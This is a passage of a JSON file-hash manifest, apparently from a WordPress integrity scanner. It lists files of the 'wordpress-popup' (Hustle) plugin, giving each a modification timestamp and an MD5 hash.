ess-popup\\/assets\\/js\\/front\\/slide-in.js\":{\"d\":1534138296,\"h\":\"64c5a7f71a112e38d9229d0e615ba240\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/js\\/front\\/sshare.js\":{\"d\":1534138296,\"h\":\"340a8f62c0a02bcbfb25842cb5cf4b32\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/js\\/front\\/front-utils.js\":{\"d\":1534138296,\"h\":\"a6915151353542e4728edecd94165b6b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/js\\/front\\/init.js\":{\"d\":1534138296,\"h\":\"91788b5a928d975cc94a397a758b1b8a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/js\\/front\\/module.js\":{\"d\":1534138296,\"h\":\"a7dabc32a847110900ec4ef5c6a00a3b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/js\\/ads.js\":{\"d\":1534138296,\"h\":\"9537c4511591f275200f829fb7ee9ca2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/js\\/front.min.js\":{\"d\":1534138296,\"h\":\"4df1c780b000cd2d20ba49060658373a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/js\\/admin.min.js\":{\"d\":1534138296,\"h\":\"e62e63cad93414a94e4f1b54c8fcee1c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/icons\\/hustle.woff\":{\"d\":1534138296,\"h\":\"4df3c3b1edbcc69e892b925392ce3a0c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/icons\\/hustle.json\":{\"d\":1534138296,\"h\":\"cc8333111b0cbb74460f7352d3736843\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/icons\\/hustle.ttf\":{\"d\":1534138296,\"h\":\"554604af7434e497197cd00229b1af79\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/icons\\/hustle.eot\":{\"d\":1534138296,\"h\":\"9870a76f569fafd0b73c491d7d68200c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/icons\\/updating-font-icon.txt\":{\"d\":1534138296,\"h\":\"83830e16e3507047f5bc6581444ab60e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/fonts\\/wpdui-fi.ttf\":{\"d\":1534138296,\"h\":\"4a5b382d76d21c09e3cca5c97ec0f38f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/fonts\\/wpdui-fi.woff\":{\"d\":1534138296,\"h\":\"89b26010f2cb9c30c14f47596c4fc673\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/fonts\\/wpdui-fi.woff2\":{\"d\":1534138296,\"h\":\"6feb5cde39c8ebd60d74eaae9d10aceb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/fonts\\/hustle.woff\":{\"d\":1534138296,\"h\":\"31d755fa4ec1873983a74f828c8f3ec9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/fonts\\/hustle.ttf\":{\"d\":1534138296,\"h\":\"2e8579928e99c967b380a394a10d7f12\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/fonts\\/hustle.eot\":{\"d\":1534138296,\"h\":\"c3520f480ffe0eb66bb0fe5d274b1d53\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/fonts\\/wpdui-fi.eot\":{\"d\":1534138296,\"h\":\"987edafce5869cf48c81d22d56e0a7b5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/shared-ui\\/font\\/fontawesome-webfont.svgz\":{\"d\":1534138296,\"h\":\"1fe4ffdfa48998422cbdae57cd3baca6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/shared-ui\\/font\\/WPMU-DEV-App-Icons.woff\":{\"d\":1534138296,\"h\":\"15709c460fbfc7990e5838c01421389e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/shared-ui\\/font\\/fontawesome-webfont.ttf\":{\"d\":1534138296,\"h\":\"6ea09593203493bfd053a1e838c62404\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/shared-ui\\/font\\/WPMU-DEV-App-Icons.eot\":{\"d\":1534138296,\"h\":\"04032167c777f7a30ee0c1f050d520ff\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/shared-ui\\/font\\/WPMU-DEV-App-Icons.ttf\":{\"d\":1534138296,\"h\":\"33bd5c836cb3184215880cfd521169cd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/shared-ui\\/font\\/WPMU DEV Dashboard.json\":{\"d\":1534138296,\"h\":\"c4776ecd274631672894de248cfcf781\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/shared-ui\\/font\\/fontawesome-webfont.woff\":{\"d\":1534138296,\"h\":\"04b9bfc362dcb9bc999c7d1bcb44a942\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/shared-ui\\/font\\/fontawesome-webfont.eot\":{\"d\":1534138296,\"h\":\"5f4a40c122903174c4227e6871b88cff\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/shared-ui\\/plugin-ui.php\":{\"d\":1534138296,\"h\":\"d347187fc1a1e759cfa3481618e8cfea\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/shared-ui\\/wdev-ui.js\":{\"d\":1534138296,\"h\":\"0e22e5a236865af0c7e96f6b2a388ab2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/shared-ui\\/notice.css\":{\"d\":1534138296,\"h\":\"fb2d095f21604f8680f4c8c0dc8a8ee8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/shared-ui\\/wdev-ui.css\":{\"d\":1534138296,\"h\":\"6e04c4fdf0dc92c62ed094a86b37ed20\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/shared-ui\\/contributors.txt\":{\"d\":1534138296,\"h\":\"b3cdec480e77eefb1e37065a00af9b74\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/shared-ui\\/README.md\":{\"d\":1534138296,\"h\":\"4eadd464564f557ac1262ab73cffa1df\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/shared-ui\\/notice.js\":{\"d\":1534138296,\"h\":\"212aa96bf5825dd03a97b0b8a557848e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/css\\/maps\\/partials\\/social\\/icons\\/outline.css.min.map\":{\"d\":1534138296,\"h\":\"d56870f6a08966c968264d5df7ac9131\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/css\\/maps\\/partials\\/social\\/icons\\/squared.css.map\":{\"d\":1534138296,\"h\":\"c62065abc3f5288bcd699577d6ac6bd2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/css\\/maps\\/partials\\/social\\/icons\\/outline.css.map\":{\"d\":1534138296,\"h\":\"d56870f6a08966c968264d5df7ac9131\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/css\\/maps\\/partials\\/social\\/icons\\/rounded.css.min.map\":{\"d\":1534138296,\"h\":\"d14e7a59b53c0a5756fc845dac74e2c5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/css\\/maps\\/partials\\/social\\/icons\\/flat.css.min.map\":{\"d\":1534138296,\"h\":\"88f7eb08e15910dcacd75c1199808c6a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/css\\/maps\\/partials\\/social\\/icons\\/flat.css.map\":{\"d\":1534138296,\"h\":\"88f7eb08e15910dcacd75c1199808c6a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/css\\/maps\\/partials\\/social\\/icons\\/squared.css.min.map\":{\"d\":1534138296,\"h\":\"c62065abc3f5288bcd699577d6ac6bd2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/css\\/maps\\/partials\\/social\\/icons\\/rounded.css.map\":{\"d\":1534138296,\"h\":\"d14e7a59b53c0a5756fc845dac74e2c5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/css\\/maps\\/admin.css.min.map\":{\"d\":1534138296,\"h\":\"3904d4f2eaf38d42c71cf15c1733251e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/css\\/maps\\/front.css.min.map\":{\"d\":1534138296,\"h\":\"76af46144351c6a69247a1d4a37c23bd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/css\\/maps\\/grid.css.min.map\":{\"d\":1534138296,\"h\":\"1b94e7456192ce4b37c18511abb52bd2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/css\\/maps\\/ie-admin.css.min.map\":{\"d\":1534138296,\"h\":\"408c828fcc403675094907305645d96e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/css\\/maps\\/ie-front.css.min.map\":{\"d\":1534138296,\"h\":\"3c62b705b2d6894189fac8364404d1e1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/css\\/partials\\/social\\/icons\\/flat.css\":{\"d\":1534138296,\"h\":\"f19c009077b23cf3dc29e6eda608b50e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/css\\/partials\\/social\\/icons\\/squared.min.css\":{\"d\":1534138296,\"h\":\"971261d6ebc59ad96066ef5a8fe9aee5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/css\\/partials\\/social\\/icons\\/squared.css\":{\"d\":1534138296,\"h\":\"971261d6ebc59ad96066ef5a8fe9aee5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/css\\/partials\\/social\\/icons\\/rounded.css\":{\"d\":1534138296,\"h\":\"249fa10121e9f346ba993e043fc3c33f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/css\\/partials\\/social\\/icons\\/outline.min.css\":{\"d\":1534138296,\"h\":\"17c5fa8e2dbb71308853d33488fb3976\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/css\\/partials\\/social\\/icons\\/flat.min.css\":{\"d\":1534138296,\"h\":\"f19c009077b23cf3dc29e6eda608b50e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/css\\/partials\\/social\\/icons\\/rounded.min.css\":{\"d\":1534138296,\"h\":\"249fa10121e9f346ba993e043fc3c33f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/css\\/partials\\/social\\/icons\\/outline.css\":{\"d\":1534138296,\"h\":\"17c5fa8e2dbb71308853d33488fb3976\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/css\\/ie-admin.min.css\":{\"d\":1534138296,\"h\":\"3a8a07ca0bdf0f04a2527e58d5e30228\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/css\\/ie-front.min.css\":{\"d\":1534138296,\"h\":\"0dc91d2f127949536d52bb4594f154a0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/css\\/grid.min.css\":{\"d\":1534138296,\"h\":\"fa95ac557626f3b279a7c2ed56b6ede6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/css\\/front.min.css\":{\"d\":1534138296,\"h\":\"34b14731435bffa62b2a518da95e7ee5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/assets\\/css\\/admin.min.css\":{\"d\":1534138296,\"h\":\"94daa7315483f2c7ec57f3da382bb6e4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-mailerlite.php\":{\"d\":1534138295,\"h\":\"acdce12e781dcd4329c5722ff0d4642f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-sendy.php\":{\"d\":1534138295,\"h\":\"15f136a3d9c4fa376d2fffb77e40cf30\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-campaignmonitor.php\":{\"d\":1534138295,\"h\":\"36826b8628e3e167c87da5689ed8db98\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-mautic-api.php\":{\"d\":1534138295,\"h\":\"1b2dc5515186cb25574515fcf760725c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-constantcontact.php\":{\"d\":1534138295,\"h\":\"17cba68030ca4e84f240260fa9b804b2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-mad-mimi.php\":{\"d\":1534138295,\"h\":\"6fc6e02a5e3c9c325aa9ec2b63776d20\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-infusionsoft-api.php\":{\"d\":1534138295,\"h\":\"efbe396e27fb4dc12adade0cbf03b5cc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-mailchimp.php\":{\"d\":1534138295,\"h\":\"3cb22020b3fe8a4f567a788754f579a3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-icontact.php\":{\"d\":1534138295,\"h\":\"e9d5d0f6290a5c03cd3c84ae8d63c9cb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-aweber.php\":{\"d\":1534138295,\"h\":\"e5e2d2c2520c244d00c532342717e7cb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-sendinblue.php\":{\"d\":1534138295,\"h\":\"f94b56938468cabc782ea5f955f7fc4d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-mautic.php\":{\"d\":1534138295,\"h\":\"065dfd4e15b09133b6ba23c4cff2a9e5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-zapier.php\":{\"d\":1534138295,\"h\":\"1d3fa1d4c10f4d5a3d6bc5797adb0d8b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-sendgrid.php\":{\"d\":1534138295,\"h\":\"5bf4ed9350ab31028127f53233e2dddc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-hubspot-api.php\":{\"d\":1534138295,\"h\":\"fca5812996b5dbcf37b50c1f60c1e3f2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-mad-mimi-api.php\":{\"d\":1534138295,\"h\":\"5ddc35faa1fc9f5f11ecc1580e016cd0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-sendinblue-api.php\":{\"d\":1534138295,\"h\":\"e533dd7a7ed2cd29e78b91be59b6b2f6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-sendgrid-api.php\":{\"d\":1534138295,\"h\":\"ee7ab71ff8f801928518f42d74190f45\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-activecampaign.php\":{\"d\":1534138295,\"h\":\"fc2a0aaac29c3a229d3a3822a9fc5930\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-convertkit-api.php\":{\"d\":1534138295,\"h\":\"33a80ec8d08e624f76889091719770ab\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-infusion-soft.php\":{\"d\":1534138295,\"h\":\"58d8cad928bbbc4f19b201feb0342ccb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-hubspot.php\":{\"d\":1534138295,\"h\":\"b24d2c0b79f55c349fd3bb803dc72fa2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-e-newsletter.php\":{\"d\":1534138295,\"h\":\"e8bd1a7d399276ef43e0b08b0795061f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-mailerlite-api.php\":{\"d\":1534138295,\"h\":\"4ae9087fd0282e069a70590d3908d492\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-convertkit.php\":{\"d\":1534138295,\"h\":\"350cfdaff6bdfa3037673ac96318555d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-activecampaign-api.php\":{\"d\":1534138295,\"h\":\"94d3e059b59d5fb10b2f79a21a906ee9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-constantcontact-api.php\":{\"d\":1534138295,\"h\":\"41123b3bb72417e7c46a932f8ce6af4d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-mailchimp-api.php\":{\"d\":1534138295,\"h\":\"506b6cd40bdbe1641fb231ac355919ab\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-get-response-api.php\":{\"d\":1534138295,\"h\":\"4bf44d2d64411eb2609b684adb22c770\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-get-response.php\":{\"d\":1534138295,\"h\":\"219fa1f0a47e52a2c5344136a04f3cad\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/providers\\/opt-in-icontact-api.php\":{\"d\":1534138295,\"h\":\"da4ed10268bbc31aaa9ad6646eaf59b7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/slidein\\/hustle-slidein-design.php\":{\"d\":1534138295,\"h\":\"eddc0037ec94da945719b605600c6f58\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/slidein\\/hustle-slidein-settings.php\":{\"d\":1534138295,\"h\":\"515d373041b2f735ab35e7bb3db7a4c9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/slidein\\/hustle-slidein-content.php\":{\"d\":1534138295,\"h\":\"d93fe606bd4dbcf51462d0cf4ccb28b5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/display-conditions\\/opt-in-condition-visitor-not-logged-in.php\":{\"d\":1534138295,\"h\":\"14fb44bd3af91419804ae4dfafed2883\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/display-conditions\\/opt-in-condition-shown-less-than.php\":{\"d\":1534138295,\"h\":\"5caa52c1c51cbc405e511dd6b2b5c2bf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/display-conditions\\/opt-in-condition-not-from-internal-link.php\":{\"d\":1534138295,\"h\":\"b846b02ea464ae5627fe360a47f034d2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/display-conditions\\/opt-in-condition-only-on-mobile.php\":{\"d\":1534138295,\"h\":\"20ecb3ca90f7621373215402b55ca9bf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/display-conditions\\/opt-in-condition-categories.php\":{\"d\":1534138295,\"h\":\"8075b927be8c9364b3cda6d801712268\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/display-conditions\\/opt-in-condition-in-a-country.php\":{\"d\":1534138295,\"h\":\"a079eea0c5f74f443a2a3298acd84389\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/display-conditions\\/opt-in-condition-cpt.php\":{\"d\":1534138295,\"h\":\"d6531aa63b893cc8b0d023e9905bde8e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/display-conditions\\/opt-in-condition-posts.php\":{\"d\":1534138295,\"h\":\"331f51b86a45eeede3fd8570020a3d63\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/display-conditions\\/opt-in-condition-not-on-specific-url.php\":{\"d\":1534138295,\"h\":\"b79a7406557dbee813f5aa4538ebba77\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/display-conditions\\/opt-in-condition-not-on-mobile.php\":{\"d\":1534138295,\"h\":\"70894d84f60769c4aa9fbbbde35cb494\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/display-conditions\\/opt-in-condition-pages.php\":{\"d\":1534138295,\"h\":\"32c34688951b702f638850a59ede7658\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/display-conditions\\/opt-in-condition-abstract.php\":{\"d\":1534138295,\"h\":\"81ae151dfe16e86f9692950932f87d5b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/display-conditions\\/opt-in-condition-not-from-specific-ref.php\":{\"d\":1534138295,\"h\":\"5705a68dc44abd2a80b539279af018c4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/display-conditions\\/opt-in-condition-tags.php\":{\"d\":1534138295,\"h\":\"2d8fe817bd70196207df5b4ccd22d9ca\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/display-conditions\\/opt-in-condition-on-specific-url.php\":{\"d\":1534138295,\"h\":\"96e69cea04c5d09cf1065b7d4aa3cc0f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/display-conditions\\/opt-in-condition-interface.php\":{\"d\":1534138295,\"h\":\"935343d411dd2f1c6de206a81c5ede86\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/display-conditions\\/opt-in-condition-not-in-a-country.php\":{\"d\":1534138295,\"h\":\"75637a5b2c7da6f99fd1eb2c39a5ebaf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/display-conditions\\/opt-in-condition-visitor-logged-in.php\":{\"d\":1534138295,\"h\":\"dd34afad89fe6875fd743070756e93ae\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/display-conditions\\/opt-in-condition-only-on-not-found.php\":{\"d\":1534138295,\"h\":\"fb65c3f2c9fc085f2826f3fac522a6e7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/display-conditions\\/opt-in-condition-from-specific-ref.php\":{\"d\":1534138295,\"h\":\"d52929669047779d04b6bdd225a7403f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/display-conditions\\/opt-in-condition-visitor-has-never-commented.php\":{\"d\":1534138295,\"h\":\"5057a61ce264b103765a248c7e443439\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/display-conditions\\/opt-in-condition-visitor-has-commented.php\":{\"d\":1534138295,\"h\":\"02d020bf912c5d177b68984a6a478976\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/display-conditions\\/opt-in-condition-from-search-engine.php\":{\"d\":1534138295,\"h\":\"6bea98eebb5f8c2a9a9fd4cdf4fa2fa4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/sshare\\/hustle-sshare-types.php\":{\"d\":1534138295,\"h\":\"1f1b96b5d85b6a5dd40e3267f419c8c5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/sshare\\/hustle-sshare-settings.php\":{\"d\":1534138295,\"h\":\"c5ac8c5e341588a0eb3480110b82f4ce\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/sshare\\/hustle-sshare-content.php\":{\"d\":1534138295,\"h\":\"230bdad7bab099231a62b2768bbaa7c0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/sshare\\/hustle-sshare-design.php\":{\"d\":1534138295,\"h\":\"caef673e7bbce0117cc3945e35642e55\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/popup\\/hustle-popup-content.php\":{\"d\":1534138295,\"h\":\"16a135f237be29bde8f08b5a84cbaacb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/popup\\/hustle-popup-settings.php\":{\"d\":1534138295,\"h\":\"92683f0d9e6e24eb475d5cc9d24b3bde\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/popup\\/hustle-popup-design.php\":{\"d\":1534138295,\"h\":\"5c154a47e8790fb49959f9132794094a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/embed\\/hustle-embedded-settings.php\":{\"d\":1534138295,\"h\":\"579e299e789795789e9e2c050ce58986\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/embed\\/hustle-embedded-content.php\":{\"d\":1534138295,\"h\":\"5b41ad2d2c6e33b0536eeca022eac6a5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/embed\\/hustle-embedded-design.php\":{\"d\":1534138295,\"h\":\"493078ef436301d6d5fe57f897e853e4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-meta.php\":{\"d\":1534138295,\"h\":\"c87819f881f40c8961e9456ea2a768c7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/i